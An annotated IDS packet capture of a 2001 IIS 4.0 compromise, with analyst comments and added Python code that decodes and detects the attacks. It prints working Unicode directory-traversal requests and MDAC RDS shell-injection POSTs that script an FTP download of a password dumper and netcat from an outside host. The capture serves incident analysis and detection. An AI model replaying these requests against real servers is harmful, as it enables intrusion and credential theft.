!@# Apologies in advance for the typos.
!@#
!@#
[**] Outbound http Response [**]
02/04-05:25:14.555344 172.16.1.106:80 -> 213.116.251.162:1764
TCP TTL:127 TOS:0x0 ID:54134 IpLen:20 DgmLen:267 DF
***AP*** Seq: 0x2CAE8C2F Ack: 0x8E35E9AE Win: 0x20AE TcpLen: 20
HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Date: Sun, 04 Feb 20
01 12:24:10 GMT..Content-Type: text/html..Set-Cookie: ASPSESSION
IDGQQGGQZK=KPGNFIPAKMIDBOCJNGOAAHBD; path=/..Cache-control: priv
ate..Transfer-Encoding: chunked....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# First breach: reads boot.ini through the IIS Unicode directory traversal.
!@# ..%C0%AF.. is an overlong UTF-8 encoding of ../ that IIS decoded only after its '..' path check.
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:25:22.525676 213.116.251.162:1765 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11031 IpLen:20 DgmLen:496 DF
***AP*** Seq: 0x8E406992 Ack: 0x2CAE9E9B Win: 0x2238 TcpLen: 20
GET /guest/default.asp/....../....../..%AF../..%C0%AF../boot.ini
HTTP/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg, image
/pjpeg, application/vnd.ms-excel, application/msword, applicatio
n/vnd.ms-powerpoint, */*..Accept-Language: en-us..Accept-Encodin
g: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01
; Windows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connectio
n: Keep-Alive..Cookie: ASPSESSIONIDGQQGGQZK=KPGNFIPAKMIDBOCJNGOA
AHBD....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# The chunked body (contents of boot.ini) is in the following TCP segments
[**] Outbound http Response [**]
02/04-05:25:22.559828 172.16.1.106:80 -> 213.116.251.162:1765
TCP TTL:127 TOS:0x0 ID:58998 IpLen:20 DgmLen:200 DF
***AP*** Seq: 0x2CAE9E9B Ack: 0x8E406B5A Win: 0x1DD4 TcpLen: 20
HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Date: Sun, 04 Feb 20
01 12:24:18 GMT..Content-Type: text/html..Cache-control: private
..Transfer-Encoding: chunked....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
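The traversal above only works because IIS checked the path for '..' before it percent-decoded and UTF-8-decoded it, and because its decoder accepted overlong sequences (%C0%AF is a two-byte encoding of the one-byte character '/', which a conforming decoder must reject). The following is an added example, not part of the original capture or the analyst's notes: a canonicalizer that decodes the way a permissive decoder would, so the hidden '../' becomes visible, next to a strict check that shows the request is not valid UTF-8 at all. Latin-1 pass-through for stray bytes such as the lone %AF is a readable stand-in, not IIS's exact behaviour, and dot-only components like '......' are kept literally rather than guessing how NT collapsed them.

```python
"""Canonicalize a request path the way a permissive UTF-8 decoder would, so
the '../' hidden inside %C0%AF becomes visible (the IIS 4/5 Unicode bug)."""
import re
from typing import List, Tuple
from urllib.parse import unquote_to_bytes


def decode_lenient_utf8(data: bytes) -> Tuple[str, List[str]]:
    """Decode UTF-8 but also accept overlong two-byte forms (C0 xx / C1 xx),
    which a conforming decoder must reject. Returns the text and the list of
    overlong sequences seen. Any other byte passes through as Latin-1 so the
    output stays readable (assumption: a stand-in, not IIS's exact handling;
    three- and four-byte forms are not needed for this traffic)."""
    out: List[str] = []
    overlong: List[str] = []
    i = 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            cp = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F)
            if b <= 0xC1:                  # value fits in 7 bits: overlong
                overlong.append(data[i:i + 2].hex())
            out.append(chr(cp))
            i += 2
        else:
            out.append(chr(b))             # ASCII, or Latin-1 pass-through
            i += 1
    return "".join(out), overlong


def is_strict_utf8(data: bytes) -> bool:
    """What a conforming decoder says about the same bytes."""
    try:
        data.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


def canonicalize(url_path: str) -> Tuple[str, bool, List[str]]:
    """Percent-decode, lenient-decode, then resolve '.' and '..' against the
    URL root, treating '/' and '\\' alike. Returns (resolved, escaped_root,
    overlong_sequences)."""
    raw = unquote_to_bytes(url_path.split("?", 1)[0])
    text, overlong = decode_lenient_utf8(raw)
    stack: List[str] = []
    escaped = False
    for seg in re.split(r"[\\/]", text):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True             # climbed above the URL root
            continue
        stack.append(seg)
    return "/" + "/".join(stack), escaped, overlong


def is_unicode_traversal(url_path: str) -> bool:
    """Detection rule: any overlong-encoded byte, or '..' climbing above root."""
    _, escaped, overlong = canonicalize(url_path)
    return escaped or bool(overlong)


# The request from the capture, plus the MS00-078 textbook form for comparison.
CAPTURED = "/guest/default.asp/....../....../..%AF../..%C0%AF../boot.ini"
TEXTBOOK = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir"

if __name__ == "__main__":
    for p in (CAPTURED, TEXTBOOK, "/guest/default.asp"):
        print(p, "->", canonicalize(p), "strict utf-8:",
              is_strict_utf8(unquote_to_bytes(p)), "flag:", is_unicode_traversal(p))
```

On the captured request the decoder reports the c0af sequence and the decoded text contains "../../boot.ini"; on the textbook form it resolves to /winnt/system32/cmd.exe and reports that the path climbed above the root. A Snort rule matching the raw "%c0%af" string catches the first; the canonicalize-then-compare approach also catches variants that use a different overlong form.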
!@# Failed attempt to list the contents of the /mdac/ directory: IIS answers 403 Directory Listing Denied
[**] Outbound http Response [**]
02/04-05:26:35.937245 172.16.1.106:80 -> 213.116.251.162:1769
TCP TTL:127 TOS:0x0 ID:62326 IpLen:20 DgmLen:374 DF
***AP*** Seq: 0x2CAFCE0E Ack: 0x8F72C638 Win: 0x20A5 TcpLen: 20
HTTP/1.1 403 Access Forbidden..Server: Microsoft-IIS/4.0..Date:
Sun, 04 Feb 2001 12:25:31 GMT..Connection: close..Content-Type:
text/html..Content-Length: 172....
Directory L
isting Denied.Directory Listing Denied<
/h1>This Virtual Directory does not allow contents to be listed.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# First use of the MDAC RDS vulnerability: the Jet query carries |shell("cmd /c echo werd >> c:\fun")|, appending 'werd' to c:\fun. Likely just testing the exploit.
!@# The query and connect string are sent as UTF-16LE, which is why every character is followed by a '.' (NUL) in the dump.
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:27:08.159193 213.116.251.162:1771 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11060 IpLen:20 DgmLen:745 DF
***AP*** Seq: 0x8FEE9575 Ack: 0x2CB04B6E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .w.e.r.d. .>.>. .c.:.\.f.u.n.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
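The RDS request body above is a multipart message whose application/x-varg part carries the query and the Jet connect string as UTF-16LE; the dotted text in the dump is the NUL high byte of each character, and the unquoted |shell("...")| inside the WHERE clause is a Jet VBA expression that runs cmd.exe when the query is evaluated. Here is an added example, not from the original capture or the analyst, that rebuilds a body of that shape from the captured strings and pulls the injected command and the .mdb the attacker pointed at back out of it. The NUL filler standing in for the x-varg type headers is an assumption; only the text is taken from the capture.

```python
"""Decode an RDS (msadcs.dll) AdvancedDataFactory.Query body and recover the
injected Jet shell() command. The strings travel as UTF-16LE, so an ASCII
content match for 'shell(' never fires on the raw body."""
import re
from typing import Dict, List

BOUNDARY = b"!ADM!ROX!YOUR!WORLD!"


def build_rds_body(query: str, connect: str) -> bytes:
    """Build a body shaped like the captured POST. The real x-varg stream has
    short binary type headers before each string; the NUL filler here is a
    stand-in for them (assumption), the UTF-16LE text is what matters."""
    varg = (b"\x00" * 12 + query.encode("utf-16-le")
            + b"\x00" * 6 + connect.encode("utf-16-le") + b"\x00\x00")
    return (b"--" + BOUNDARY + b"\r\nContent-Type: application/x-varg\r\n"
            + b"Content-Length: %d\r\n\r\n" % len(varg) + varg
            + b"\r\n--" + BOUNDARY + b"--\r\n")


def utf16le_strings(data: bytes, min_chars: int = 6) -> List[str]:
    """Extract runs of printable ASCII encoded as UTF-16LE (char, NUL pairs)."""
    pat = rb"(?:[\x20-\x7e]\x00){%d,}" % min_chars
    return [m.group(0).decode("utf-16-le") for m in re.finditer(pat, data)]


def analyze_rds_post(body: bytes) -> Dict[str, str]:
    """Return the decoded query, the OS command injected through |shell()|,
    and the connect-string details (ODBC driver and the .mdb used as a vehicle)."""
    strings = utf16le_strings(body)
    query = next((s for s in strings if s.lower().startswith("select")), "")
    connect = next((s for s in strings if "driver=" in s.lower()), "")
    shell = re.search(r'\|shell\("(.*?)"\)\|', query)
    dbq = re.search(r"dbq=([^;]+)", connect, re.I)
    driver = re.search(r"driver=\{([^}]+)\}", connect, re.I)
    return {
        "query": query,
        "command": shell.group(1) if shell else "",
        "driver": driver.group(1) if driver else "",
        "dbq": dbq.group(1) if dbq else "",
    }


# Constructed sample: the strings from the first RDS request (the 'werd' test).
SAMPLE_QUERY = ("Select * from Customers where City="
                "'|shell(\"cmd /c echo werd >> c:\\fun\")|'")
SAMPLE_CONNECT = ("driver={Microsoft Access Driver (*.mdb)};"
                  "dbq=c:\\winnt\\help\\iis\\htm\\tutorial\\btcustmr.mdb;")
SAMPLE_BODY = build_rds_body(SAMPLE_QUERY, SAMPLE_CONNECT)

if __name__ == "__main__":
    print("ascii 'shell(' in raw body:", b"shell(" in SAMPLE_BODY)
    print(analyze_rds_post(SAMPLE_BODY))
```

The dbq path is the point to watch in detection: the attacker does not need a real application database, any .mdb that ships with the system (here an IIS tutorial sample) is enough to get the Jet engine to evaluate the expression. Snort's rule keys on the msadcs.dll URL for that reason, since the payload itself is not matchable as plain text.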
!@# Uses the Unicode traversal to read c:\fun and check whether the RDS command ran
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:27:15.708044 213.116.251.162:1772 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11071 IpLen:20 DgmLen:491 DF
***AP*** Seq: 0x900CDB75 Ack: 0x2CB0698D Win: 0x2238 TcpLen: 20
GET /guest/default.asp/....../....../..%AF../..%C0%AF../fun HTTP
/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpe
g, application/vnd.ms-excel, application/msword, application/vnd
.ms-powerpoint, */*..Accept-Language: en-us..Accept-Encoding: gz
ip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Win
dows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Ke
ep-Alive..Cookie: ASPSESSIONIDGQQGGQZK=KPGNFIPAKMIDBOCJNGOAAHBD.
...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# 200 OK: c:\fun exists, so the RDS shell() command ran and the Unicode traversal is confirmed
!@# The chunked body (contents of c:\fun) is in the following TCP segments
[**] Outbound http Response [**]
02/04-05:27:15.714436 172.16.1.106:80 -> 213.116.251.162:1772
TCP TTL:127 TOS:0x0 ID:1911 IpLen:20 DgmLen:200 DF
***AP*** Seq: 0x2CB0698D Ack: 0x900CDD38 Win: 0x2075 TcpLen: 20
HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Date: Sun, 04 Feb 20
01 12:26:11 GMT..Content-Type: text/html..Cache-control: private
..Transfer-Encoding: chunked....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses the MDAC exploit to build an FTP command script (ftpcom), one echo per request, to download a toolkit
!@# Toolkit is samdump.dll, pdump.exe and nc.exe
!@# nc.exe is version 1.10 (you can see the version string in the FTP data stream later on)
!@# Judging from the size of pdump.exe reported on the FTP control channel later on, this looks like
!@# pwdump2.exe (32,768 bytes). This is supported by the size of samdump.dll (36,864 bytes)
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:32:51.574859 213.116.251.162:1778 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11126 IpLen:20 DgmLen:759 DF
***AP*** Seq: 0x951052A9 Ack: 0x2CB58902 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 565..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 356..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .u.s.e.r. .j.o.h.n.a.2.k. .>. .f.t.p.c.o.m.".).|.'......
.d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r.
.(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h
.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!
YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:32:58.852572 213.116.251.162:1780 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11140 IpLen:20 DgmLen:757 DF
***AP*** Seq: 0x952D922A Ack: 0x2CB5A5D6 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 563..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 354..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .h.a.c.k.e.r.2.0.0.0. .>.>. .f.t.p.c.o.m.".).|.'.......d
.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(
.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t
.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YO
UR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:05.873985 213.116.251.162:1782 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11151 IpLen:20 DgmLen:767 DF
***AP*** Seq: 0x9549C836 Ack: 0x2CB5C142 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 573..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 364..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .s.a.m.d.u.m.p...d.l.l. .>.>. .f.t.p.c.o.m.".).|
.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i
.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i
.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!
ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:12.881418 213.116.251.162:1784 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11162 IpLen:20 DgmLen:763 DF
***AP*** Seq: 0x95669396 Ack: 0x2CB5DCAE Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 569..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 360..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .p.d.u.m.p...e.x.e. .>.>. .f.t.p.c.o.m.".).|.'..
.....d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e
.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s
.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!
ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:19.823370 213.116.251.162:1786 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11173 IpLen:20 DgmLen:757 DF
***AP*** Seq: 0x95826381 Ack: 0x2CB5F7D4 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 563..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 354..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .n.c...e.x.e. .>.>. .f.t.p.c.o.m.".).|.'.......d
.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(
.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t
.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YO
UR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:26.809677 213.116.251.162:1789 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11189 IpLen:20 DgmLen:745 DF
***AP*** Seq: 0x959EB0E1 Ack: 0x2CB61304 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .q.u.i.t. .>.>. .f.t.p.c.o.m.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses the MDAC vulnerability to open a scripted FTP session to www.nether.net
!@# The -n switch suppresses auto-login, so the script's own 'user' line supplies the credentials
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:33.995519 213.116.251.162:1791 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11203 IpLen:20 DgmLen:769 DF
***AP*** Seq: 0x95BB80F0 Ack: 0x2CB62EE9 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 575..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 366..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f
.t.p. .-.s.:.f.t.p.c.o.m. .-.n. .w.w.w...n.e.t.h.e.r...n.e.t.".)
.|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r
.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\
.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...-
-!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:34.938125 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44707 IpLen:20 DgmLen:94 DF
***AP*** Seq: 0x2D782DB2 Ack: 0x2CB633DA Win: 0x832C TcpLen: 20
220 freenet.nether.net FTP server (SunOS 5.7) ready...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:34.944019 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:31863 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2CB633DA Ack: 0x2D782DE8 Win: 0x2202 TcpLen: 20
USER johna2k..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.005368 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44709 IpLen:20 DgmLen:76 DF
***AP*** Seq: 0x2D782DE8 Ack: 0x2CB633E8 Win: 0x832C TcpLen: 20
331 Password required for johna2k...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.034552 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:32119 IpLen:20 DgmLen:57 DF
***AP*** Seq: 0x2CB633E8 Ack: 0x2D782E0C Win: 0x21DE TcpLen: 20
PASS hacker2000..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# FTP login fails; the intruder probably cannot see this, since the ftp client's output never comes back in the HTTP response
[**] FTP control channel [**]
02/04-05:33:35.082277 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44710 IpLen:20 DgmLen:62 DF
***AP*** Seq: 0x2D782E0C Ack: 0x2CB633F9 Win: 0x832C TcpLen: 20
530 Login incorrect...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.089514 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:32375 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CB633F9 Ack: 0x2D782E22 Win: 0x21C8 TcpLen: 20
PORT 172,16,1,106,12,64..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.144118 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44711 IpLen:20 DgmLen:78 DF
***AP*** Seq: 0x2D782E22 Ack: 0x2CB63412 Win: 0x832C TcpLen: 20
530 Please login with USER and PASS...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.149295 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:32631 IpLen:20 DgmLen:58 DF
***AP*** Seq: 0x2CB63412 Ack: 0x2D782E48 Win: 0x21A2 TcpLen: 20
RETR samdump.dll..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.202201 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44712 IpLen:20 DgmLen:78 DF
***AP*** Seq: 0x2D782E48 Ack: 0x2CB63424 Win: 0x832C TcpLen: 20
530 Please login with USER and PASS...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.208941 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:32887 IpLen:20 DgmLen:56 DF
***AP*** Seq: 0x2CB63424 Ack: 0x2D782E6E Win: 0x217C TcpLen: 20
RETR pdump.exe..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.255965 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44713 IpLen:20 DgmLen:78 DF
***AP*** Seq: 0x2D782E6E Ack: 0x2CB63434 Win: 0x832C TcpLen: 20
530 Please login with USER and PASS...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.262909 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:33143 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CB63434 Ack: 0x2D782E94 Win: 0x2156 TcpLen: 20
RETR nc.exe..
